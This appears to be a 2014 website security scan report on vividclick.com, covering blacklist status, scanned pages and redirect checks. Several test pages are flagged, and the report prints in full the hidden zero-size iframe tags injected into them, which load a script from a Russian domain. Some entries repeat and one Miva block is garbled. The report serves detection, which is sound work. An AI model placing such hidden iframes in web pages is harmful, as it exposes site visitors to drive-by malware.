Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vividclick.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vividclick.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vividclick.com/ | 200 OK Content-Length: 6827 Content-Type: text/html | clean |
http://vividclick.com/test/apacheasp/test.asp | 200 OK Content-Length: 1113 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 style: hidden src: http://guaabaut23.ru/img/header.php?ftd=4849008&path=%7chttpdocs%7ctest%7capacheasp%7c&sys=un&wrk=20 <iframe width="0" height="0" style="display:none;" id="frmchkldver" src="http://guaabaut23.ru/img/header.php?ftd=4849008&path=%7chttpdocs%7ctest%7capacheasp%7c&sys=un&wrk=20"> | ||
http://vividclick.com/test404page.js | 404 Not Found Content-Length: 1127 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 style: hidden src: http://guaabaut23.ru/img/header.php?ftd=4849008&path=%7cerror_docs%7c&sys=un&wrk=20 <iframe width="0" height="0" style="display:none;" id="frmchkldver" src="http://guaabaut23.ru/img/header.php?ftd=4849008&path=%7cerror_docs%7c&sys=un&wrk=20"> | ||
http://vividclick.com/test/ssi/test.shtml | 200 OK Content-Length: 1179 Content-Type: text/html | clean |
http://vividclick.com/test/php/test.php | 200 OK Content-Length: 1102 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 style: hidden src: http://guaabaut23.ru/img/header.php?ftd=4849008&path=%7chttpdocs%7ctest%7cphp%7c&sys=un&wrk=20 <iframe width="0" height="0" style="display:none;" id="frmchkldver" src="http://guaabaut23.ru/img/header.php?ftd=4849008&path=%7chttpdocs%7ctest%7cphp%7c&sys=un&wrk=20"> | ||
http://vividclick.com/test/coldfusion/test.cfm | 200 OK Content-Length: 660 Content-Type: text/html | clean |
http://vividclick.com/test/perl/test.pl | 200 OK Content-Length: 436 Content-Type: text/html | clean |
http://vividclick.com/test/python/test.py | 200 OK Content-Length: 776 Content-Type: text/html | clean |
http://vividclick.com/test/fcgi/test.fcgi | 200 OK Content-Length: 915 Content-Type: text/html | clean |
http://vividclick.com/test/miva/test.mvc? | 200 OK Content-Length: 6326 Content-Type: text/plain | clean |
http://vividclick.com/test/miva/documenturlTest=sysvars[Run]</A></TR>
Test Data Directory
Test=datadir
Test Script Directory
Test=scriptdir</TABLE></P>test_systemvariablessysvarlistposcurrent,
test_datadirectoryok
Testing writes to data directory:
diag.dats.time_t, s.version, s.apitype|MvEXPORT_Error
Testing reads from data directory:
l.time_t, l.version, l.api <span>...172 symbols skipped</span> | 404 Not Found Content-Length: 1127 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 style: hidden src: http://guaabaut23.ru/img/header.php?ftd=4849008&path=%7cerror_docs%7c&sys=un&wrk=20 <iframe width="0" height="0" style="display:none;" id="frmchkldver" src="http://guaabaut23.ru/img/header.php?ftd=4849008&path=%7cerror_docs%7c&sys=un&wrk=20"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vividclick.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 16:40:20 GMT
Accept-Ranges: bytes
ETag: "1667e5d-1aab-1281880"
Server: Apache/2.2.6 (Fedora)
Content-Length: 6827
Content-Type: text/html
Last-Modified: Wed, 10 Sep 2014 22:59:30 GMT
...6827 bytes of data.
GET / HTTP/1.1
Host: vividclick.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 16:40:20 GMT
Accept-Ranges: bytes
ETag: "1667e5d-1aab-1281880"
Server: Apache/2.2.6 (Fedora)
Content-Length: 6827
Content-Type: text/html
Last-Modified: Wed, 10 Sep 2014 22:59:30 GMT
...6827 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vividclick.com
Referer: http://www.google.com/search?q=vividclick.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vividclick.com
Referer: http://www.google.com/search?q=vividclick.com
Result:
The result is similar to the first query. There are no suspicious redirects found.